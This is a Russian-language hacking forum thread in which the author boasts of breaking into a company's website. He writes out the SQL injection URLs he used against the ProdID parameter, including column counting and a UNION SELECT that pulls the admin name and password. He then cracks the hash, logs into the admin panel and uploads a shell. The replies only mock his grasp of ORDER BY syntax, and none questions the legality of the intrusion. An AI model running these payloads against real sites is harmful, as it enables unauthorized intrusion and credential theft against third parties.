Короче дело было на днях. Пришел с работы и полез в сеть. Искал юизби винт (подарок другу). И попал на сайт одной известной конторы в моем любимом городе.
Название не буду называть дабы не вызывать интереса юного скрипт-кидиса. Можно добавить, что фирма, где я работаю постоянно обращ. к ним за комплект..
Кликнул на Продукция и попал в меню выбора продукции, но тут мое внимание удалилось в строку браузера.


http://comp.com/x.php?ProdID=916

Ну и типично я решил проверить на скуль. Поставил заветную кавычку и получил скуль, правда без каких либо ошибок.

Далее


http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*


Затем возник проблемс , который был решен


http://comp.com/x.php?ProdID=-916+union+select+1,2,3,4,5/*


Ничего что надо не вывело, ну сразу нашел выход


http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,2,3,4,5,6/*


Версия мускула была 4 . Осталось подобрать таблиц и вывести заветный пасс админа, т.к . админка уже была найдена.
Хочу добавить, что данный скрипт был написан очень якобы крутой и дорогой конторой за неплохие деньги как потом выяснилось!!!!))))))))))))))

Но при подборе вышел небольшой обломс. Я решил забить, решил стукнуть за помощью на ачат, но прошелся лесов, кста привет и спасибо Termin@L за поддержку.

Сутки прошли, но результатов 0% даже после прогона по словарю предпол. таблиц.

Дальше самое интересно!! Решил зайти в админку, ввел типично admin:admin прошелся в тундру, но решил проверить html код страницы :


<td class=TableRow1 align=right><input type="text" class=txt name="AdminName" value=""></td>
</tr>
<tr>
<td class=TableRow1>Пароль:</td>
<td class=TableRow1 align=right><input type="password" class=txt name="AdminPWD"></td>
</tr>
<tr>

<td class=TableRow1 colspan="2" align=right><hr size=1><input type="submit" class=but value="Войти"></td>



И что остается только хлопать ушами от радости
AdminPWD--- таблица с паролем админа, ну и аналогично AdminName-- его логин.

Запрос выглядел след. образом:


http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,name,3,pas sword,5,6+from+AdminPWD+limit+0,1/*


ПОлучил des пароль. После подбора успешно залогонился в админку , были траблы с заливом шелла , но затем вопрос был решен.


Поздравляю все С НОВЫМ ГОДОМ. Мемберы ачата здоровья вам , меньше мазалей на заднице и успешных тем!!!!!

А что прости, тут необычного?

Не обычное не стал описывать ибо уже УКА!!!!_)

Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:


http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*


"Замечательно."

и чем это тебя убило?

fly, а ты вобще понимаешь назначение такой вот конструкции, проще http://comp.com/x.php?ProdID=916+order+by+5/*

и вобще я всегда говорил, что получать кол-во столбцов лучше с реально существующим параметром, т.е. не -916, а 916

Название не буду называть дабы не вызывать интереса юного скрипт-кидиса

улыбнуло

Умняги хватит флейм разводить.)))

Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:

Типично опеч.

http://comp.com/x.php?ProdID=916+order+by+5/*

1) Что меня убило, ну к примеру то что ты до сих пор не понимаешь конструкцию order by зачем делать сортировку сначала по первому потом по второму потом по третьему и т.д. столбцу? какой смысл?

Если бы ты юзал нормально order+by+n - отсортировать по n-ому столбцу то хоть времени бы меньше затратил. Но чувствуется раз ты не понимаешь этого, то не разбираешся в синтаксисе sql и следовательно вся твоя работа тупая подстановка "чего то там" в параметры на подобие id и т.д печально.

2) Что в этой теме такого что она должна быть отдельной?

флай не тупи,тебе же сказали в чем ты ошибся

90% постящих скули в теме скл инжекшн не понимают почему это работает. так что ничего удивительного в этих ошибках я не вижу

Я не понимаю гении к чему вы видите, что я нихера не шарб?

Я не понимаю гении к чему вы видите, что я нихера не шарб?
именно)

ЗЫ поздравляю с первым (?) удачным хэком

Я не понимаю гении к чему вы видите, что я нихера не шарб?
Напомнило :

- Пижон, пижон, пижон...
.....
- Ты безнадёжен!...

Да, там еще число столбцов в одном примере - 5, а в другом - 6

Флейм глупый.!!! Критику я люблю она делает умнее, того кого критикуют!!!

Да ладно вам, зачем наезжать на fly-a? Человек просто радуется успешной SQL атаке и решил поделиться с вами... =\

Флейм глупый.!!! Критику я люблю она делает умнее, того кого критикуют!!!
а что можно критиковать в абсолютной банальности? поминаю там была бы новая техника, новые методы или ещё чё-нить такое, а тут что? обыкновенная sql инхэкция. остаётся тока указать на неполное понимание темы автором (в частности про order) и несостыковки в "повести"

fly, понимаешь всем здесь присутствующим надоели подобного рода статьи потому что их на просторах инета в том числе и всем читаемом ][ целая куча, да и самих наверное таких историй вагон и маленькая тележка. В своем посте ты ничего нового или необычного не описал, допустил кучу ошибок... Понимаешь если люди пишут, что то подобное то пишут, что то интересное, необычное, если нет то надо было тему назвать "Мой взлом" и сунуть в Болталку... Это мое маленькое имхо...